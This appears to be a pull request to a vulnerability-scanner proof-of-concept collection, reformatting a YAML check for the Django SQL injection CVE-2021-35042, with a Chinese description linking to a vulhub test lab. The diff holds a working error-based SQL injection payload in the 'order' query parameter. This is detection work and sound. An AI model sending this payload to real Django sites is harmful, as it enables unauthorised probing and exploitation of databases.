### PR TITLE
检测cve-2021-35042

### DIFF
--- a/pocs/django-cve-2021-35042.yml
+++ b/pocs/django-cve-2021-35042.yml
@@ -1,14 +1,19 @@
 name: poc-yaml-django-cve-2021-35042
+manual: true
+transport: http
 set:
-  r1: randomInt(1, 10000)
+  r: randomInt(10000, 1000000)
 rules:
-  - method: GET
-    path: >-
-      /?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20md5({{r1}}))),1)%23
-    follow_redirects: false
-    expression: |
-      response.body.bcontains(bytes(substr(md5(string(r1)), 0, 16)))
+  r0:
+    request:
+      cache: true
+      method: GET
+      path: /?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20md5({{r}}))),1)%23
+      follow_redirects: true
+    expression: response.body.bcontains(bytes(substr(md5(string(r)), 0, 16)))
+expression: r0()
 detail:
   author: Jarcis-cy(https://github.com/Jarcis-cy)
   links:
     - https://github.com/vulhub/vulhub/blob/master/django/CVE-2021-35042/README.zh-cn.md
+Affected Version: "3.1-3.2*"


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
检测django的sql注入漏洞，是cve-2021-35042
## 测试环境
https://github.com/vulhub/vulhub/tree/master/django/CVE-2021-35042

